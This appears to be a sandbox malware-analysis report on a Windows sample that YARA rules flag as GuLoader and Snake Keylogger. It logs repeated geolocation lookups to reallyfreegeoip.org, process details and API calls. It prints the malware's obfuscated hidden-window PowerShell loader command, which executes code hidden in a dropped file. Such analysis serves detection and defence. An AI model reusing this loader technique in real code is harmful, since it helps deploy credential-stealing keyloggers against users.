2	192.168.2.9	49909	104.21.112.1	443	5400	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:02:46 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 15:02:46 UTC	859	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 15:02:46 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1836155 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YLThORd903Qcl29RiQnLYqqnvIpmvq7qftoMtmNXBETjiq%2Fud5en0BagmXhN4a21VoG1qf%2FbGpp%2BPRmFWEVsjxKVj%2BGhrwz1czwMeAZL7a71laquQ%2BBeJPHAt6k8wYn4saVWopVh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffd8ccaff0e727b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1997&min_rtt=1994&rtt_var=750&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1464393&cwnd=234&unsent_bytes=0&cid=5a8b058d15bb70a9&ts=165&x=0"
2025-01-10 15:02:46 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49915	104.21.112.1	443	5400	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:02:47 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 15:02:47 UTC	855	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 15:02:47 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1836156 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qXG6ER6UZqm5Tmblj%2FfTwnUCowFzy95WfelG%2BoBFRyARqCeyFn1wxeADXzhaaerWh%2BuJ1jZVwpeLQwH1SEeDtiKxC7IrztSOvJb3Va9MZ0rZq5FNhfbWhmaizqjTo9PeXqMqkbra"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffd8cd05edfc34f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1473&min_rtt=1466&rtt_var=565&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1910994&cwnd=181&unsent_bytes=0&cid=2c70289dba2e1603&ts=151&x=0"
2025-01-10 15:02:47 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49924	104.21.112.1	443	5400	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:02:48 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 15:02:48 UTC	861	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 15:02:48 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1836157 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sxLAuf4mfKcywojFosNK8I9i5K%2BLBMGjrMMGW0wjnYiXOBrBhfBltmfDlJbnxpUB91hYV6R2jl%2B%2BvzrcCJfcVMgirvV%2B%2Bom%2FgZJAgLnZGN1bPZsSXpCi5WGtOYzTeEsXBg6Bwn5Z"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffd8cd82d1a0f5b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1657&min_rtt=1648&rtt_var=636&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1696687&cwnd=221&unsent_bytes=0&cid=6f6dfab1ff59de3a&ts=142&x=0"
2025-01-10 15:02:48 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49933	104.21.112.1	443	5400	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:02:49 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 15:02:49 UTC	855	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 15:02:49 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1836158 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HSz3tcxCYveJLsIm92UCg5Pf%2B34FepBUWy5CjO7KzOd%2B4hs3CaEqwtJcyhTTnk0GPAjYK%2FyV6YTTWLkNP6Y7ctS63qZmj1o2oWUzehTI5zrxTWhjjLR0biv1z54YTPY9Vz8axQNp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffd8ce02d5fc34f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1483&min_rtt=1482&rtt_var=559&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1950567&cwnd=181&unsent_bytes=0&cid=3dcc244f27cd6588&ts=147&x=0"
2025-01-10 15:02:49 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49945	104.21.112.1	443	5400	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:02:50 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 15:02:51 UTC	860	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 15:02:51 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1836160 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zmO8bOpoWqA%2Bg6LXVS11bxFCouL9iwJxC5tGyWQ1%2FA3Vdxbt3s0Jb4T9oXO489%2BcPOXlocRJJzY6Ih3Scpf6O%2Bg6NTrlvzJwZdFWB7Xh6VvHrXcBBrI4EYUwExBLYTpYpjgff29A"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffd8ce90da143b3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=24066&min_rtt=10967&rtt_var=13031&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=266253&cwnd=203&unsent_bytes=0&cid=be44bb20218b543c&ts=180&x=0"
2025-01-10 15:02:51 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49953	104.21.112.1	443	5400	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:02:52 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 15:02:52 UTC	855	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 15:02:52 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1836161 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yuEa2b0XUG39OoeaFigKZGZfsejNzF4r96eWjrZSbHZDBIX0qcph1My47eI8E1MqarFpJPWH1Xdib7rnyGfY7oufiRV5y3Sw%2Fhw9cmeoWD4NB%2F5tR14MAyGVRqob%2BGbGt3g9h0Id"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffd8cf10e740f5b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1618&min_rtt=1608&rtt_var=623&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1726788&cwnd=221&unsent_bytes=0&cid=6ce3766c04b73807&ts=141&x=0"
2025-01-10 15:02:52 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49964	104.21.112.1	443	5400	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:02:53 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 15:02:53 UTC	855	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 15:02:53 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1836162 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YX5gE1963VI%2FKv9KDDEAnslNaWeFdz3ObTPvC0zf8oKH7DnpQRuTEcoqcWxn6UgwKOU0Jc%2FMogK1PUF3RDQT42p0rXwCkYZ3AIpWlvJ%2Fvd7LMSvHMG9S96loQsB713mMBuGsjvU6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffd8cf8dcb643b3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1558&rtt_var=610&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1755862&cwnd=203&unsent_bytes=0&cid=d641f99e9b07e4c6&ts=146&x=0"
2025-01-10 15:02:53 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.9	49974	104.21.112.1	443	5400	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:02:54 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 15:02:54 UTC	865	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 15:02:54 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1836163 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xVnnf21Hf1u1%2FhboH01QJZE5rNWT6I9JuwXTovp8zhYHxS2vXyx%2BEaU6s8KkKdg4vf1SIf8D%2Fu%2FoGiTMT7Mdtdny4DXv0wN%2BfbShc9JFNSYWuWgERFhkL%2FW8%2BxEg%2ByKMNVqBUdsl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffd8d00a8c7727b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1986&min_rtt=1979&rtt_var=757&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1430671&cwnd=234&unsent_bytes=0&cid=2aeb09e5d6b4b9ab&ts=139&x=0"
2025-01-10 15:02:54 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Target ID:	0
Start time:	10:01:00
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\ln5S7fIBkY.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ln5S7fIBkY.exe"
Imagebase:	0x400000
File size:	678'408 bytes
MD5 hash:	E38257F3EAA78E2DCA3C3063B05EAA70
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:01:01
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle hidden "$Appeachment=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Sharpness.Kon';$Oplandsavises=$Appeachment.SubString(12242,3);.$Oplandsavises($Appeachment)"
Imagebase:	0x370000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2353301520.000000000C110000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:01:01
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:02:22
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\syswow64\msiexec.exe"
Imagebase:	0x750000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.2772117735.00000000247B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.2772117735.00000000245F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	24.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.5%
Total number of Nodes:	1338
Total number of Limit Nodes:	35

Executed Functions

Function 0040336C Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 0040338F
GetVersion.KERNEL32 ref: 00403395
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033C8
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403405
OleInitialize.OLE32(00000000), ref: 0040340C
SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,000002B4,00000000), ref: 00403428
GetCommandLineW.KERNEL32(007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040343D
CharNextW.USER32(00000000,"C:\Users\user\Desktop\ln5S7fIBkY.exe",00000020,"C:\Users\user\Desktop\ln5S7fIBkY.exe",00000000,?,00000006,00000008,0000000A), ref: 00403475

Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035AF
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C0
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CC
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E0
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E8
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035F9
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403601
DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403615

Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4

OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E0
ExitProcess.KERNEL32 ref: 00403701
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ln5S7fIBkY.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403714
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ln5S7fIBkY.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403723
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ln5S7fIBkY.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040372E
